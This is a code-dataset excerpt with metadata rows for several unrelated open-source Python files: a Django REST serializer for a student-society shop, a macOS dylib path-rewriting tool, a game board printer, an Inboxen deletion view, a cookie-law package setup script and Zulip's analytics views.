repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
KSG-IT/ksg-nett
|
api/serializers.py
|
1
|
4959
|
from django.conf import settings
from rest_framework import serializers
from rest_framework_simplejwt.serializers import TokenObtainSlidingSerializer
from api.exceptions import InsufficientFundsException, NoSociSessionError
from economy.models import SociProduct, ProductOrder, SociSession, SociBankAccount
class CustomTokenObtainSlidingSerializer(TokenObtainSlidingSerializer):
"""
Overridden so we can obtain a token for a user based only on the card uuid.
"""
username_field = "card_uuid"
def __init__(self, *args, **kwargs):
"""
Overridden from `TokenObtainSerializer` since this adds a required
field `password` to the serializer that we don't need.
"""
super().__init__(*args, **kwargs)
del self.fields['password']
def validate(self, attrs):
"""
Overridden from `TokenObtainSlidingSerializer` since
this expects a username and password to be supplied.
"""
data = {}
token = self.get_token(self.context['request'].user)
data['token'] = str(token)
return data
# ===============================
# ECONOMY
# ===============================
from sensors.consts import MEASUREMENT_TYPE_CHOICES
from sensors.models import SensorMeasurement
class SociProductSerializer(serializers.Serializer):
sku_number = serializers.CharField(read_only=True, label="Product SKU number")
name = serializers.CharField(read_only=True, label="Product name")
price = serializers.IntegerField(read_only=True, label="Product price in NOK")
description = serializers.CharField(read_only=True, allow_blank=True, allow_null=True, label="Product description",
help_text="Returns `null` if no description exists")
icon = serializers.CharField(read_only=True, label="Product icon descriptor")
class CheckBalanceSerializer(serializers.Serializer):
id = serializers.IntegerField(read_only=True, label="This soci bank account ID")
user = serializers.CharField(source='user.get_full_name', read_only=True, label="User´s full name")
balance = serializers.IntegerField(read_only=True, label="Balance in NOK",
help_text="Should not be displayed publicly")
class ChargeSociBankAccountDeserializer(serializers.Serializer):
sku = serializers.CharField(label="Product SKU number to charge for")
order_size = serializers.IntegerField(default=1, required=False, label="Order size for this product",
help_text="Defaults to 1 if not supplied")
@staticmethod
def validate_sku(value):
if not SociProduct.objects.filter(sku_number=value).exists():
raise serializers.ValidationError('SKU number is invalid.')
return value
@staticmethod
def validate_order_size(value):
if value <= 0:
raise serializers.ValidationError('Order size must be positive.')
return value
def validate(self, attrs):
if attrs['sku'] != settings.DIRECT_CHARGE_SKU:
attrs['amount'] = SociProduct.objects.get(sku_number=attrs['sku']).price
else:
attrs['amount'] = 1
self.context['total'] += attrs['amount'] * attrs['order_size']
if self.context['total'] > self.context['soci_bank_account'].balance:
raise InsufficientFundsException()
if SociSession.get_active_session() is None:
raise NoSociSessionError()
return attrs
def create(self, validated_data):
product_order = ProductOrder.objects.create(
product=SociProduct.objects.get(sku_number=validated_data.pop('sku')), **validated_data
)
return product_order
class PurchaseSerializer(serializers.Serializer):
amount_charged = serializers.IntegerField(read_only=True, source='total_amount',
label="Amount that was charged from user´s Soci account")
amount_remaining = serializers.IntegerField(read_only=True, source='source.balance',
label="Remaining balance in user´s Soci account",
help_text="Should not be displayed publicly")
products_purchased = serializers.ListField(read_only=True, child=serializers.CharField(),
help_text="The products that were purchased")
class SensorMeasurementSerializer(serializers.Serializer):
type = serializers.ChoiceField(
choices=MEASUREMENT_TYPE_CHOICES,
label="The type of measurement.",
)
value = serializers.FloatField(
label="The value of the measurement",
)
created_at = serializers.DateTimeField(
label="The time of the measurement",
)
def create(self, validated_data):
return SensorMeasurement.objects.create(**validated_data)
|
gpl-3.0
| 6,613,007,558,135,177,000
| 36.545455
| 119
| 0.650525
| false
| 4.460846
| false
| false
| false
|
fordcars/SDL3D
|
tools/Frameworkify/frameworkify.py
|
1
|
3860
|
#!/usr/bin/env python -S
# -*- coding: utf-8 -*-
r"""
frameworkify
~~~~~~~~~~~~
A small command line tool that can rewrite the paths to dynamic
loaded libraries in .dylib files so that they reference other
paths. By default it will rewrite the path so that it points to
the bundle's Frameworks folder. This can be paired with a CMake
post build action to make proper bundles without having to
recompile a bunch of dylibs to reference the framework.
Usage::
$ frameworkify.py MyApplication.app/Contents/MacOS/MyApplication \
> /path/to/mylib.dylib
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
from optparse import OptionParser
def find_bundle(executable):
executable = os.path.abspath(executable)
if not os.path.isfile(executable):
raise RuntimeError('Executable does not exist')
folder, exe_name = os.path.split(executable)
content_path, folder = os.path.split(folder)
if folder != 'MacOS':
raise RuntimeError('Executable not located inside a bundle')
return content_path
def find_baked_dylibs(executable):
from subprocess import Popen, PIPE
c = Popen(['otool', '-L', executable], stdout=PIPE)
lines = c.communicate()[0].splitlines()
return [x.strip().split(' (')[0] for x in lines[1:]]
def find_matching_dylib(dylibs, basename):
lbasename = basename.lower()
for dylib in dylibs:
if os.path.basename(dylib).lower() == lbasename:
return dylib
def rewrite_path(executable, old, new):
from subprocess import Popen
Popen(['install_name_tool', '-change', old, new, executable]).wait()
def copy_to_framework(bundle_path, filename, target_name):
from shutil import copy2
framework_path = os.path.join(bundle_path, 'Frameworks')
if not os.path.isdir(framework_path):
os.mkdir(framework_path)
copy2(filename, os.path.join(framework_path, target_name))
def perform_rewrite_operation(rewrites, executable, bundle_path, copy=True):
for old_path, new_path, dylib_path in rewrites:
rewrite_path(executable, old_path, new_path)
if copy:
copy_to_framework(bundle_path, dylib_path,
os.path.basename(new_path))
def frameworkify(executable, dylibs, nocopy, path):
bundle = find_bundle(executable)
baked_dylibs = find_baked_dylibs(executable)
def _make_new_path(dylib_name):
if path:
return os.path.join(path, dylib_name)
return '@executable_path/../Frameworks/' + dylib_name
rewrites = []
for dylib in dylibs:
dylib_name = os.path.basename(dylib)
dylib_path_match = find_matching_dylib(baked_dylibs, dylib_name)
if dylib_path_match is None:
raise Exception('dylib "%s" is not referenced by "%s"' % (
dylib_name,
executable
))
rewrites.append((dylib_path_match, _make_new_path(dylib_name), dylib))
perform_rewrite_operation(rewrites, executable, bundle, not nocopy)
def main():
parser = OptionParser()
parser.add_option('-p', '--path', dest='path', metavar='PATH',
help='alternative path to dylib')
parser.add_option('-C', '--nocopy', dest='nocopy', action='store_true',
help='don\'t copy dylib to framework folder')
opts, args = parser.parse_args()
if len(args) < 2:
parser.error('Not enough arguments: executable and a list of dylibs')
if opts.path and not opts.nocopy:
parser.error('Path combined with copy operation is not supported')
try:
frameworkify(args[0], args[1:], opts.nocopy, opts.path)
except Exception, e:
parser.error(str(e))
sys.exit(1)
if __name__ == '__main__':
main()
|
gpl-3.0
| -5,696,709,541,733,503,000
| 31.720339
| 78
| 0.644041
| false
| 3.780607
| false
| false
| false
|
acbilson/forbidden-island
|
tests/test_print.py
|
1
|
1905
|
import sys
sys.path.append('../src')
from tiles import *
from tile import *
class Test(object):
def __init__(self):
self.board = ""
def gen_board(self, tiles):
segments = []
rows = [[0,1],
[2,3,4,5],
[6,7,8,9,10,11],
[12,13,14,15,16,17],
[18,19,20,21],
[22,23]]
spaces = [' ',
' ',
'',
'',
' ',
' ']
names = [t.name for t in tiles]
players = [t.player for t in tiles]
statuses = [t.status for t in tiles]
allSegs = []
for i in range(0, len(rows)):
nameSegments = self._gen_segments(rows[i], spaces[i], ('/', '\\'), names)
playerSegments = self._gen_segments(rows[i], spaces[i], ('|', '|'), players)
statusSegments = self._gen_segments(rows[i], spaces[i], ('\\', '/'), statuses, newLine=True)
allSegs.append(''.join(nameSegments))
allSegs.append(''.join(playerSegments))
allSegs.append(''.join(statusSegments))
return ''.join(allSegs)
def _gen_segments(self, row, space, dividers, tileSegments, newLine=None):
TILE_SPACE = ' '
segments = []
segments.append(space)
last = row[len(row)-1]
rowSegments = tileSegments[row[0]:last+1]
for i,rs in enumerate(rowSegments):
segments.append(dividers[0] + rs.value + dividers[1])
if len(rowSegments) != i:
segments.append(TILE_SPACE)
segments.append(space + '\n')
if newLine != None:
segments.append('\n')
return segments
if __name__ == '__main__':
tiles = Tiles()
t = Test()
board = t.gen_board(tiles.tiles)
print(board)
|
gpl-3.0
| 8,462,663,968,441,839,000
| 23.74026
| 104
| 0.467192
| false
| 3.764822
| false
| false
| false
|
Inboxen/website
|
views/inbox/delete.py
|
1
|
2017
|
##
# Copyright (C) 2013 Jessica Tallon & Matt Molyneaux
#
# This file is part of Inboxen.
#
# Inboxen is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Inboxen is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Inboxen. If not, see <http://www.gnu.org/licenses/>.
##
from django.views import generic
from django.utils.translation import ugettext as _
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse_lazy
from django.contrib import messages
from inboxen import models
from queue.delete.tasks import delete_inbox
from website import forms
from website.views import base
__all__ = ["InboxDeletionView"]
class InboxDeletionView(base.CommonContextMixin, base.LoginRequiredMixin, generic.DeleteView):
model = models.Inbox
success_url = reverse_lazy('user-home')
headline = _("Delete Inbox")
template_name = "inbox/delete.html"
def get_object(self, *args, **kwargs):
return self.request.user.inbox_set.get(
inbox=self.kwargs["inbox"],
domain__domain=self.kwargs["domain"]
)
def delete(self, request, *args, **kawrgs):
self.object = self.get_object()
success_url = self.get_success_url()
self.object.flags.deleted = True
self.object.save()
delete_inbox.delay(self.object.id, request.user.id)
messages.success(request, _("{0}@{1} has been deleted.".format(self.object.inbox, self.object.domain.domain)))
return HttpResponseRedirect(success_url)
|
agpl-3.0
| -7,981,159,622,210,445,000
| 36.351852
| 118
| 0.706495
| false
| 3.80566
| false
| false
| false
|
juan-cb/django-cookie-law
|
setup.py
|
1
|
1609
|
#!/usr/bin/env python
import os
from setuptools import setup, find_packages
from itertools import chain
from glob import glob
import cookielaw
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: JavaScript',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Session',
]
package_data_globs = (
'cookielaw/templates/cookielaw/*.html',
'cookielaw/static/cookielaw/*/*',
'cookielaw/locale/*/*/*'
)
package_data = []
for f in chain(*map(glob, package_data_globs)):
package_data.append(f.split('/', 1)[1])
setup(
author='Piotr Kilczuk',
author_email='piotr@tymaszweb.pl',
name='django-cookie-law',
version='.'.join(str(v) for v in cookielaw.VERSION),
description='Helps your Django project comply with EU cookie law regulations',
long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
url='https://github.com/TyMaszWeb/django-cookie-law',
license='BSD License',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
'Django>=1.2',
'django-classy-tags>=0.3.0',
],
tests_require=[
'selenium==3.0.1',
],
packages=find_packages(),
package_data={'cookielaw': package_data},
include_package_data=False,
zip_safe=False,
test_suite='runtests.main',
)
|
bsd-2-clause
| -8,123,308,249,982,098,000
| 27.22807
| 88
| 0.649472
| false
| 3.408898
| false
| false
| false
|
sonali0901/zulip
|
analytics/views.py
|
1
|
37020
|
from __future__ import absolute_import, division
from django.conf import settings
from django.core import urlresolvers
from django.db import connection
from django.db.models import Sum
from django.db.models.query import QuerySet
from django.http import HttpResponseNotFound, HttpRequest, HttpResponse
from django.template import RequestContext, loader
from django.utils import timezone
from django.utils.translation import ugettext as _
from jinja2 import Markup as mark_safe
from analytics.lib.counts import CountStat, process_count_stat, COUNT_STATS
from analytics.lib.time_utils import time_range
from analytics.models import BaseCount, InstallationCount, RealmCount, \
UserCount, StreamCount, last_successful_fill
from zerver.decorator import has_request_variables, REQ, zulip_internal, \
zulip_login_required, to_non_negative_int, to_utc_datetime
from zerver.lib.request import JsonableError
from zerver.lib.response import json_success
from zerver.lib.timestamp import ceiling_to_hour, ceiling_to_day, timestamp_to_datetime
from zerver.models import Realm, UserProfile, UserActivity, \
UserActivityInterval, Client
from zproject.jinja2 import render_to_response
from collections import defaultdict
from datetime import datetime, timedelta
import itertools
import json
import logging
import pytz
import re
import time
from six.moves import filter, map, range, zip
from typing import Any, Dict, List, Tuple, Optional, Callable, Type, \
Union, Text
@zulip_login_required
def stats(request):
# type: (HttpRequest) -> HttpResponse
return render_to_response('analytics/stats.html',
context=dict(realm_name = request.user.realm.name))
@has_request_variables
def get_chart_data(request, user_profile, chart_name=REQ(),
min_length=REQ(converter=to_non_negative_int, default=None),
start=REQ(converter=to_utc_datetime, default=None),
end=REQ(converter=to_utc_datetime, default=None)):
# type: (HttpRequest, UserProfile, Text, Optional[int], Optional[datetime], Optional[datetime]) -> HttpResponse
if chart_name == 'number_of_humans':
stat = COUNT_STATS['active_users:is_bot:day']
tables = [RealmCount]
subgroups = ['false', 'true']
labels = ['human', 'bot']
labels_sort_function = None
include_empty_subgroups = [True]
elif chart_name == 'messages_sent_over_time':
stat = COUNT_STATS['messages_sent:is_bot:hour']
tables = [RealmCount, UserCount]
subgroups = ['false', 'true']
labels = ['human', 'bot']
labels_sort_function = None
include_empty_subgroups = [True, False]
elif chart_name == 'messages_sent_by_message_type':
stat = COUNT_STATS['messages_sent:message_type:day']
tables = [RealmCount, UserCount]
subgroups = ['public_stream', 'private_stream', 'private_message']
labels = ['Public Streams', 'Private Streams', 'PMs & Group PMs']
labels_sort_function = lambda data: sort_by_totals(data['realm'])
include_empty_subgroups = [True, True]
elif chart_name == 'messages_sent_by_client':
stat = COUNT_STATS['messages_sent:client:day']
tables = [RealmCount, UserCount]
subgroups = [str(x) for x in Client.objects.values_list('id', flat=True).order_by('id')]
# these are further re-written by client_label_map
labels = list(Client.objects.values_list('name', flat=True).order_by('id'))
labels_sort_function = sort_client_labels
include_empty_subgroups = [False, False]
else:
raise JsonableError(_("Unknown chart name: %s") % (chart_name,))
# Most likely someone using our API endpoint. The /stats page does not
# pass a start or end in its requests.
if start is not None and end is not None and start > end:
raise JsonableError(_("Start time is later than end time. Start: %(start)s, End: %(end)s") %
{'start': start, 'end': end})
realm = user_profile.realm
if start is None:
start = realm.date_created
if end is None:
end = last_successful_fill(stat.property)
if end is None or start > end:
logging.warning("User from realm %s attempted to access /stats, but the computed "
"start time: %s (creation time of realm) is later than the computed "
"end time: %s (last successful analytics update). Is the "
"analytics cron job running?" % (realm.string_id, start, end))
raise JsonableError(_("No analytics data available. Please contact your server administrator."))
end_times = time_range(start, end, stat.frequency, min_length)
data = {'end_times': end_times, 'frequency': stat.frequency, 'interval': stat.interval}
for table, include_empty_subgroups_ in zip(tables, include_empty_subgroups):
if table == RealmCount:
data['realm'] = get_time_series_by_subgroup(
stat, RealmCount, realm.id, end_times, subgroups, labels, include_empty_subgroups_)
if table == UserCount:
data['user'] = get_time_series_by_subgroup(
stat, UserCount, user_profile.id, end_times, subgroups, labels, include_empty_subgroups_)
if labels_sort_function is not None:
data['display_order'] = labels_sort_function(data)
else:
data['display_order'] = None
return json_success(data=data)
def sort_by_totals(value_arrays):
# type: (Dict[str, List[int]]) -> List[str]
totals = []
for label, values in value_arrays.items():
totals.append((label, sum(values)))
totals.sort(key=lambda label_total: label_total[1], reverse=True)
return [label for label, total in totals]
# For any given user, we want to show a fixed set of clients in the chart,
# regardless of the time aggregation or whether we're looking at realm or
# user data. This fixed set ideally includes the clients most important in
# understanding the realm's traffic and the user's traffic. This function
# tries to rank the clients so that taking the first N elements of the
# sorted list has a reasonable chance of doing so.
def sort_client_labels(data):
# type: (Dict[str, Dict[str, List[int]]]) -> List[str]
realm_order = sort_by_totals(data['realm'])
user_order = sort_by_totals(data['user'])
label_sort_values = {} # type: Dict[str, float]
for i, label in enumerate(realm_order):
label_sort_values[label] = i
for i, label in enumerate(user_order):
label_sort_values[label] = min(i-.1, label_sort_values.get(label, i))
return [label for label, sort_value in sorted(label_sort_values.items(),
key=lambda x: x[1])]
def table_filtered_to_id(table, key_id):
# type: (Type[BaseCount], int) -> QuerySet
if table == RealmCount:
return RealmCount.objects.filter(realm_id=key_id)
elif table == UserCount:
return UserCount.objects.filter(user_id=key_id)
elif table == StreamCount:
return StreamCount.objects.filter(stream_id=key_id)
elif table == InstallationCount:
return InstallationCount.objects.all()
else:
raise ValueError("Unknown table: %s" % (table,))
def client_label_map(name):
# type: (str) -> str
if name == "website":
return "Website"
if name.startswith("desktop app"):
return "Old desktop app"
if name == "ZulipAndroid":
return "Android app"
if name == "ZulipiOS":
return "Old iOS app"
if name == "ZulipMobile":
return "New iOS app"
if name in ["ZulipPython", "API: Python"]:
return "Python API"
if name.startswith("Zulip") and name.endswith("Webhook"):
return name[len("Zulip"):-len("Webhook")] + " webhook"
# Clients in dev environment autogenerated data start with _ so
# that it's easy to manually drop without affecting other data.
if settings.DEVELOPMENT and name.startswith("_"):
return name[1:]
return name
def rewrite_client_arrays(value_arrays):
# type: (Dict[str, List[int]]) -> Dict[str, List[int]]
mapped_arrays = {} # type: Dict[str, List[int]]
for label, array in value_arrays.items():
mapped_label = client_label_map(label)
if mapped_label in mapped_arrays:
for i in range(0, len(array)):
mapped_arrays[mapped_label][i] += value_arrays[label][i]
else:
mapped_arrays[mapped_label] = [value_arrays[label][i] for i in range(0, len(array))]
return mapped_arrays
def get_time_series_by_subgroup(stat, table, key_id, end_times, subgroups, labels, include_empty_subgroups):
# type: (CountStat, Type[BaseCount], Optional[int], List[datetime], List[str], List[str], bool) -> Dict[str, List[int]]
if len(subgroups) != len(labels):
raise ValueError("subgroups and labels have lengths %s and %s, which are different." %
(len(subgroups), len(labels)))
queryset = table_filtered_to_id(table, key_id).filter(property=stat.property) \
.values_list('subgroup', 'end_time', 'value')
value_dicts = defaultdict(lambda: defaultdict(int)) # type: Dict[Optional[str], Dict[datetime, int]]
for subgroup, end_time, value in queryset:
value_dicts[subgroup][end_time] = value
value_arrays = {}
for subgroup, label in zip(subgroups, labels):
if (subgroup in value_dicts) or include_empty_subgroups:
value_arrays[label] = [value_dicts[subgroup][end_time] for end_time in end_times]
if stat == COUNT_STATS['messages_sent:client:day']:
# HACK: We rewrite these arrays to collapse the Client objects
# with similar names into a single sum, and generally give
# them better names
return rewrite_client_arrays(value_arrays)
return value_arrays
eastern_tz = pytz.timezone('US/Eastern')
def make_table(title, cols, rows, has_row_class=False):
# type: (str, List[str], List[Any], bool) -> str
if not has_row_class:
def fix_row(row):
# type: (Any) -> Dict[str, Any]
return dict(cells=row, row_class=None)
rows = list(map(fix_row, rows))
data = dict(title=title, cols=cols, rows=rows)
content = loader.render_to_string(
'analytics/ad_hoc_query.html',
dict(data=data)
)
return content
def dictfetchall(cursor):
# type: (connection.cursor) -> List[Dict[str, Any]]
"Returns all rows from a cursor as a dict"
desc = cursor.description
return [
dict(list(zip([col[0] for col in desc], row)))
for row in cursor.fetchall()
]
def get_realm_day_counts():
# type: () -> Dict[str, Dict[str, str]]
query = '''
select
r.string_id,
(now()::date - pub_date::date) age,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
join zerver_client c on c.id = m.sending_client_id
where
(not up.is_bot)
and
pub_date > now()::date - interval '8 day'
and
c.name not in ('zephyr_mirror', 'ZulipMonitoring')
group by
r.string_id,
age
order by
r.string_id,
age
'''
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
counts = defaultdict(dict) # type: Dict[str, Dict[int, int]]
for row in rows:
counts[row['string_id']][row['age']] = row['cnt']
result = {}
for string_id in counts:
raw_cnts = [counts[string_id].get(age, 0) for age in range(8)]
min_cnt = min(raw_cnts)
max_cnt = max(raw_cnts)
def format_count(cnt):
# type: (int) -> str
if cnt == min_cnt:
good_bad = 'bad'
elif cnt == max_cnt:
good_bad = 'good'
else:
good_bad = 'neutral'
return '<td class="number %s">%s</td>' % (good_bad, cnt)
cnts = ''.join(map(format_count, raw_cnts))
result[string_id] = dict(cnts=cnts)
return result
def realm_summary_table(realm_minutes):
# type: (Dict[str, float]) -> str
query = '''
SELECT
realm.string_id,
coalesce(user_counts.active_user_count, 0) active_user_count,
coalesce(at_risk_counts.at_risk_count, 0) at_risk_count,
(
SELECT
count(*)
FROM zerver_userprofile up
WHERE up.realm_id = realm.id
AND is_active
AND not is_bot
) user_profile_count,
(
SELECT
count(*)
FROM zerver_userprofile up
WHERE up.realm_id = realm.id
AND is_active
AND is_bot
) bot_count
FROM zerver_realm realm
LEFT OUTER JOIN
(
SELECT
up.realm_id realm_id,
count(distinct(ua.user_profile_id)) active_user_count
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
WHERE
query in (
'/json/send_message',
'send_message_backend',
'/api/v1/send_message',
'/json/update_pointer',
'/json/users/me/pointer'
)
AND
last_visit > now() - interval '1 day'
AND
not is_bot
GROUP BY realm_id
) user_counts
ON user_counts.realm_id = realm.id
LEFT OUTER JOIN
(
SELECT
realm_id,
count(*) at_risk_count
FROM (
SELECT
realm.id as realm_id,
up.email
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
JOIN zerver_realm realm
ON realm.id = up.realm_id
WHERE up.is_active
AND (not up.is_bot)
AND
ua.query in (
'/json/send_message',
'send_message_backend',
'/api/v1/send_message',
'/json/update_pointer',
'/json/users/me/pointer'
)
GROUP by realm.id, up.email
HAVING max(last_visit) between
now() - interval '7 day' and
now() - interval '1 day'
) as at_risk_users
GROUP BY realm_id
) at_risk_counts
ON at_risk_counts.realm_id = realm.id
WHERE EXISTS (
SELECT *
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
WHERE
query in (
'/json/send_message',
'/api/v1/send_message',
'send_message_backend',
'/json/update_pointer',
'/json/users/me/pointer'
)
AND
up.realm_id = realm.id
AND
last_visit > now() - interval '2 week'
)
ORDER BY active_user_count DESC, string_id ASC
'''
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
# get messages sent per day
counts = get_realm_day_counts()
for row in rows:
try:
row['history'] = counts[row['string_id']]['cnts']
except Exception:
row['history'] = ''
# augment data with realm_minutes
total_hours = 0.0
for row in rows:
string_id = row['string_id']
minutes = realm_minutes.get(string_id, 0.0)
hours = minutes / 60.0
total_hours += hours
row['hours'] = str(int(hours))
try:
row['hours_per_user'] = '%.1f' % (hours / row['active_user_count'],)
except Exception:
pass
# formatting
for row in rows:
row['string_id'] = realm_activity_link(row['string_id'])
# Count active sites
def meets_goal(row):
# type: (Dict[str, int]) -> bool
return row['active_user_count'] >= 5
num_active_sites = len(list(filter(meets_goal, rows)))
# create totals
total_active_user_count = 0
total_user_profile_count = 0
total_bot_count = 0
total_at_risk_count = 0
for row in rows:
total_active_user_count += int(row['active_user_count'])
total_user_profile_count += int(row['user_profile_count'])
total_bot_count += int(row['bot_count'])
total_at_risk_count += int(row['at_risk_count'])
rows.append(dict(
string_id='Total',
active_user_count=total_active_user_count,
user_profile_count=total_user_profile_count,
bot_count=total_bot_count,
hours=int(total_hours),
at_risk_count=total_at_risk_count,
))
content = loader.render_to_string(
'analytics/realm_summary_table.html',
dict(rows=rows, num_active_sites=num_active_sites)
)
return content
def user_activity_intervals():
# type: () -> Tuple[mark_safe, Dict[str, float]]
day_end = timestamp_to_datetime(time.time())
day_start = day_end - timedelta(hours=24)
output = "Per-user online duration for the last 24 hours:\n"
total_duration = timedelta(0)
all_intervals = UserActivityInterval.objects.filter(
end__gte=day_start,
start__lte=day_end
).select_related(
'user_profile',
'user_profile__realm'
).only(
'start',
'end',
'user_profile__email',
'user_profile__realm__string_id'
).order_by(
'user_profile__realm__string_id',
'user_profile__email'
)
by_string_id = lambda row: row.user_profile.realm.string_id
by_email = lambda row: row.user_profile.email
realm_minutes = {}
for string_id, realm_intervals in itertools.groupby(all_intervals, by_string_id):
realm_duration = timedelta(0)
output += '<hr>%s\n' % (string_id,)
for email, intervals in itertools.groupby(realm_intervals, by_email):
duration = timedelta(0)
for interval in intervals:
start = max(day_start, interval.start)
end = min(day_end, interval.end)
duration += end - start
total_duration += duration
realm_duration += duration
output += " %-*s%s\n" % (37, email, duration)
realm_minutes[string_id] = realm_duration.total_seconds() / 60
output += "\nTotal Duration: %s\n" % (total_duration,)
output += "\nTotal Duration in minutes: %s\n" % (total_duration.total_seconds() / 60.,)
output += "Total Duration amortized to a month: %s" % (total_duration.total_seconds() * 30. / 60.,)
content = mark_safe('<pre>' + output + '</pre>')
return content, realm_minutes
def sent_messages_report(realm):
# type: (str) -> str
title = 'Recently sent messages for ' + realm
cols = [
'Date',
'Humans',
'Bots'
]
query = '''
select
series.day::date,
humans.cnt,
bots.cnt
from (
select generate_series(
(now()::date - interval '2 week'),
now()::date,
interval '1 day'
) as day
) as series
left join (
select
pub_date::date pub_date,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
(not up.is_bot)
and
pub_date > now() - interval '2 week'
group by
pub_date::date
order by
pub_date::date
) humans on
series.day = humans.pub_date
left join (
select
pub_date::date pub_date,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
up.is_bot
and
pub_date > now() - interval '2 week'
group by
pub_date::date
order by
pub_date::date
) bots on
series.day = bots.pub_date
'''
cursor = connection.cursor()
cursor.execute(query, [realm, realm])
rows = cursor.fetchall()
cursor.close()
return make_table(title, cols, rows)
def ad_hoc_queries():
# type: () -> List[Dict[str, str]]
def get_page(query, cols, title):
# type: (str, List[str], str) -> Dict[str, str]
cursor = connection.cursor()
cursor.execute(query)
rows = cursor.fetchall()
rows = list(map(list, rows))
cursor.close()
def fix_rows(i, fixup_func):
# type: (int, Union[Callable[[Realm], mark_safe], Callable[[datetime], str]]) -> None
for row in rows:
row[i] = fixup_func(row[i])
for i, col in enumerate(cols):
if col == 'Realm':
fix_rows(i, realm_activity_link)
elif col in ['Last time', 'Last visit']:
fix_rows(i, format_date_for_activity_reports)
content = make_table(title, cols, rows)
return dict(
content=content,
title=title
)
pages = []
###
for mobile_type in ['Android', 'ZulipiOS']:
title = '%s usage' % (mobile_type,)
query = '''
select
realm.string_id,
up.id user_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like '%s'
group by string_id, up.id, client.name
having max(last_visit) > now() - interval '2 week'
order by string_id, up.id, client.name
''' % (mobile_type,)
cols = [
'Realm',
'User id',
'Name',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Desktop users'
query = '''
select
realm.string_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like 'desktop%%'
group by string_id, client.name
having max(last_visit) > now() - interval '2 week'
order by string_id, client.name
'''
cols = [
'Realm',
'Client',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Integrations by realm'
query = '''
select
realm.string_id,
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by string_id, client_name
having max(last_visit) > now() - interval '2 week'
order by string_id, client_name
'''
cols = [
'Realm',
'Client',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Integrations by client'
query = '''
select
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
realm.string_id,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by client_name, string_id
having max(last_visit) > now() - interval '2 week'
order by client_name, string_id
'''
cols = [
'Client',
'Realm',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
return pages
@zulip_internal
@has_request_variables
def get_activity(request):
# type: (HttpRequest) -> HttpResponse
duration_content, realm_minutes = user_activity_intervals() # type: Tuple[mark_safe, Dict[str, float]]
counts_content = realm_summary_table(realm_minutes) # type: str
data = [
('Counts', counts_content),
('Durations', duration_content),
]
for page in ad_hoc_queries():
data.append((page['title'], page['content']))
title = 'Activity'
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title, is_home=True),
request=request
)
def get_user_activity_records_for_realm(realm, is_bot):
# type: (str, bool) -> QuerySet
fields = [
'user_profile__full_name',
'user_profile__email',
'query',
'client__name',
'count',
'last_visit',
]
records = UserActivity.objects.filter(
user_profile__realm__string_id=realm,
user_profile__is_active=True,
user_profile__is_bot=is_bot
)
records = records.order_by("user_profile__email", "-last_visit")
records = records.select_related('user_profile', 'client').only(*fields)
return records
